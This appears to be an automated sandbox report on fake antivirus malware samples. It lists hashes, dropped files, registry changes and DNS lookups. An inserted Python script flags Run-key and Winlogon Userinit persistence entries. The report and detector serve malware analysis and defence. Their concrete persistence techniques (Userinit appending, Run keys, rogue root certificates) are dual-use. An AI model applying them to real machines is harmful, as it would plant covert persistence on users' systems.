SHA1 3dbb8f7f5dfe6b235486ab867a2844b1c2143733
SHA256 3028a2b0e95143a4caa9bcd6ae794958e7469a20c6e673da067958cbf4310035
SHA512 d5eb8a07457a78f9acd0f81d2f58bbf64b52183318b87c353a590cd2a3ac3a6ec9c1452bd52306c7cf99f19b6a897b16ceb8289a7d008c5ce3b07eda9b871204

memory/4904-20-0x0000000000400000-0x0000000000410000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\30FE.tmp\302746537.bat

MD5 7d8beb22dfcfacbbc2609f88a41c1458
SHA1 52ec2b10489736b963d39a9f84b66bafbf15685f
SHA256 4aa9ed4b38514f117e6e4f326cb0a1be7f7b96199e21305e2bd6dce289d7baa2
SHA512 a26cf9168cf7450435a9fe8942445511f6fda1087db52bd73e335d6f5b544fc892999019d9291d9dcc60c3656de49688f6d63282c97706e2db286f988e44fd94

\??\c:\windows\comctl32.ocx

MD5 821511549e2aaf29889c7b812674d59b
SHA1 3b2fd80f634a3d62277e0508bedca9aae0c5a0d6
SHA256 f59cdf89f0f522ce3662e09fa847bca9b277b006c415dcc0029b416c347db9c4
SHA512 8b2e805b916e5fbfcccb0f4189372aea006789b3847b51018075187135e9b5db9098f704c1932623f356db0ee327e1539a9bf3729947e92844a26db46555e8cd

C:\Windows\MSCOMCTL.OCX

MD5 714cf24fc19a20ae0dc701b48ded2cf6
SHA1 d904d2fa7639c38ffb6e69f1ef779ca1001b8c18
SHA256 09f126e65d90026c3f659ff41b1287671b8cc1aa16240fc75dae91079a6b9712
SHA512 d375fd9b509e58c43355263753634368fa711f02a2235f31f7fa420d1ff77504d9a29bb70ae31c87671d50bd75d6b459379a1550907fbe5c37c60da835c60bc1

C:\Windows\antivirus-platinum.exe

MD5 cd1800322ccfc425014a8394b01a4b3d
SHA1 171073975effde1c712dfd86309457fd457aed33
SHA256 8115de4ad0b7e589852f521eb4260c127f8afeaa3b0021bfc98e4928a4929ac0
SHA512 92c22c025fd3a61979fa718bf2e89a86e51bf7e69c421a9534fbf9c2d5b23b7a9224d0e9f3e0501992038837015214d1ef73b532a68b7d19de559c9ab9c6e5f6

memory/2216-32-0x0000000000400000-0x000000000040D000-memory.dmp

memory/4904-35-0x0000000000400000-0x0000000000410000-memory.dmp

C:\Windows\MSCOMCTL.OCX

MD5 dbdc92c26097147bd64b1b2f6f911bc5
SHA1 6ed5c861bba59c9e90d045469514a3fc53a527a8
SHA256 42b1d8bf222e56b6cc7019f0f6cc4cb4125f9ed0f08eb9a3dd2a855a9eb5bc28
SHA512 81e7071e9421fc3b9cd9787bca6af30e0181e8a6cf45413db6a3014b8f7af949cc9a6f3106f73b7fafc91cb59d6f61253dc05c75f10c395bf2bc0a6797ed4fb3

memory/2216-38-0x0000000000400000-0x000000000040D000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win10v2004-20240226-en

Max time kernel

151s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe"

Signatures

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdwCleaner = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\6AdwCleaner.exe\" -auto" C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\8AD5C9987E6F190BD6F5416E2DE44CCD641D8CDA C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\8AD5C9987E6F190BD6F5416E2DE44CCD641D8CDA\Blob = (value omitted) C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868 C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = (value omitted) C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = (value omitted) C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe

"C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.vikingwebscanner.com udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 www.vikingwebscanner.com udp
US 8.8.8.8:53 crl.usertrust.com udp
US 172.64.149.23:80 crl.usertrust.com tcp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 8.8.8.8:53 crl.comodoca.com udp
US 104.18.38.233:80 crl.comodoca.com tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 134.71.91.104.in-addr.arpa udp
US 8.8.8.8:53 81.171.91.138.in-addr.arpa udp
US 8.8.8.8:53 79.121.231.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 67.112.168.52.in-addr.arpa udp

Files

memory/3680-0-0x00000000008B0000-0x00000000008DE000-memory.dmp

memory/3680-1-0x00007FFD10A70000-0x00007FFD11531000-memory.dmp

memory/3680-2-0x000000001B670000-0x000000001B680000-memory.dmp

memory/3680-3-0x000000001B670000-0x000000001B680000-memory.dmp

memory/3680-4-0x000000001B670000-0x000000001B680000-memory.dmp

memory/3680-5-0x000000001BF70000-0x000000001C119000-memory.dmp

memory/3680-6-0x00007FFD10A70000-0x00007FFD11531000-memory.dmp

memory/3680-7-0x000000001B670000-0x000000001B680000-memory.dmp

memory/3680-29-0x000000001BF70000-0x000000001C119000-memory.dmp

memory/3680-30-0x000000001B670000-0x000000001B680000-memory.dmp

memory/3680-31-0x000000001B670000-0x000000001B680000-memory.dmp

memory/3680-32-0x000000001BF70000-0x000000001C119000-memory.dmp

memory/3680-33-0x000000001B670000-0x000000001B680000-memory.dmp

memory/3680-34-0x000000001BF70000-0x000000001C119000-memory.dmp

memory/3680-35-0x000000001BF70000-0x000000001C119000-memory.dmp

memory/3680-36-0x000000001BF70000-0x000000001C119000-memory.dmp

memory/3680-37-0x000000001BF70000-0x000000001C119000-memory.dmp

memory/3680-38-0x000000001BF70000-0x000000001C119000-memory.dmp

memory/3680-39-0x000000001BF70000-0x000000001C119000-memory.dmp

memory/3680-40-0x000000001BF70000-0x000000001C119000-memory.dmp

memory/3680-41-0x000000001BF70000-0x000000001C119000-memory.dmp

memory/3680-42-0x000000001BF70000-0x000000001C119000-memory.dmp

memory/3680-43-0x000000001BF70000-0x000000001C119000-memory.dmp

memory/3680-44-0x000000001BF70000-0x000000001C119000-memory.dmp

Analysis: behavioral32

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win10v2004-20240226-en

Max time kernel

152s

Max time network

159s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\PCDefender.exe"

Signatures

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,\"C:\\Program Files (x86)\\Def Group\\PC Defender\\Antispyware.exe\"" C:\Windows\syswow64\MsiExec.exe N/A
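Userinit is the program winlogon.exe launches for every interactive logon. The value is a comma-separated list whose default is just C:\Windows\system32\userinit.exe, so the appended, quoted Antispyware.exe path runs at each logon before the user's shell, under the user's own token, and survives a reboot without any Run key. It was written by the 32-bit MsiExec.exe custom-action host, which is why it lands under WOW6432Node. The script below is an added example, not part of the report or the sample: it parses the report's string-valued "Set value" rows (the JSON-style escaping the report prints is undone with json.loads), splits Userinit on commas outside quotes and flags every entry that is not the default, and applies the same quote-aware split to Run-key command lines, so behavioral18's AdwCleaner entry above, which points into %TEMP%, is flagged too. The two rows embedded are copied from this report as a constructed sample; the rule names and the temp-directory heuristic are assumptions of the example.

```python
import json
import re

# Rows copied from this report: behavioral18's Run key and behavioral32's
# Userinit value (constructed sample).
PERSISTENCE_ROWS = [
    r'Set value (str) \REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdwCleaner = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\6AdwCleaner.exe\" -auto" C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe N/A',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,\"C:\\Program Files (x86)\\Def Group\\PC Defender\\Antispyware.exe\"" C:\Windows\syswow64\MsiExec.exe N/A',
]

# String values are printed as JSON-style literals (backslashes and quotes
# escaped); the greedy ".*" stops at the last quote, which is the literal's
# closing quote because the process/target columns never contain one.
STR_ROW_RE = re.compile(r'^Set value \(str\) (?P<path>\\REGISTRY\\.+?) = (?P<literal>".*")')

USERINIT_DEFAULT = r"c:\windows\system32\userinit.exe"
# Heuristic: a Run entry whose image lives in a temp directory (assumption of this example).
TEMP_MARKERS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")


def parse_str_row(row):
    """Return {'key', 'name', 'value'} with the raw (unescaped) value, else None."""
    m = STR_ROW_RE.match(row)
    if not m:
        return None
    key, _, name = m.group("path").rpartition("\\")
    return {"key": key, "name": name, "value": json.loads(m.group("literal"))}


def split_outside_quotes(text, delimiters):
    """Split on any delimiter char that is not inside double quotes; quotes are dropped."""
    parts, buf, in_quotes = [], [], False
    for ch in text:
        if ch == '"':
            in_quotes = not in_quotes
        elif ch in delimiters and not in_quotes:
            if buf:
                parts.append("".join(buf))
                buf = []
        else:
            buf.append(ch)
    if buf:
        parts.append("".join(buf))
    return parts


def check_persistence(entry):
    """Return a list of (rule, detail) findings for one parsed row."""
    key = entry["key"].lower()
    name = entry["name"].lower()
    findings = []
    if key.endswith((r"\currentversion\run", r"\currentversion\runonce")):
        image = split_outside_quotes(entry["value"], " ")[0]
        rule = "run-key-from-temp" if any(t in image.lower() for t in TEMP_MARKERS) else "run-key"
        findings.append((rule, f"{entry['name']} -> {image}"))
    elif key.endswith(r"\winlogon") and name == "userinit":
        for item in split_outside_quotes(entry["value"], ","):
            if item.strip().lower() != USERINIT_DEFAULT:
                findings.append(("userinit-extra-entry", item.strip()))
    return findings


def scan_persistence_rows(rows):
    findings = []
    for row in rows:
        entry = parse_str_row(row)
        if entry is not None:
            findings.extend(check_persistence(entry))
    return findings


if __name__ == "__main__":
    for rule, detail in scan_persistence_rows(PERSISTENCE_ROWS):
        print(f"{rule}: {detail}")
```

The Winlogon branch deliberately compares whole entries rather than searching for "userinit.exe": a value such as C:\Windows\system32\userinit.exe,C:\evil\userinit.exe would pass a substring check and still launch the second binary. The sibling Winlogon\Shell value takes the same comma-separated form and the same treatment with explorer.exe as its default.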

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Fake AV\PCDefender.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Def Group\PC Defender\hook.dll C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Installer\{FC2ABC8E-3715-4A32-B8B5-559380F45282}\_3F16219B047CF8432B7ADA.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{FC2ABC8E-3715-4A32-B8B5-559380F45282}\_3F16219B047CF8432B7ADA.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e5811dd.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI1335.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{FC2ABC8E-3715-4A32-B8B5-559380F45282}\_966CD4ED37489844400D0C.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e5811dd.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{FC2ABC8E-3715-4A32-B8B5-559380F45282} C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{FC2ABC8E-3715-4A32-B8B5-559380F45282}\_966CD4ED37489844400D0C.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e5811e1.msi C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = (value omitted) C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script\Settings C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\24 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133538927103019166" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\22\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\23 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script\Settings\JITDebug = "0" C:\Windows\syswow64\MsiExec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\23 C:\Windows\system32\msiexec.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\Fake AV\PCDefender.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\PackageCode = "18627594958587344B2B3984171915B1" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\C73BCE36FA1AA0E45AB2649A3FA0D390 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528 C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\E8CBA2CF517323A48B5B5539084F2528\DefaultFeature C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\C73BCE36FA1AA0E45AB2649A3FA0D390\E8CBA2CF517323A48B5B5539084F2528 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\PackageName = "PCDefenderSilentSetup.msi" C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\Version = "16777216" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\E8CBA2CF517323A48B5B5539084F2528 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528 C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\C73BCE36FA1AA0E45AB2649A3FA0D390 C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\E8CBA2CF517323A48B5B5539084F2528 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\ProductName = "PC Defender" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\Media C:\Windows\system32\msiexec.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
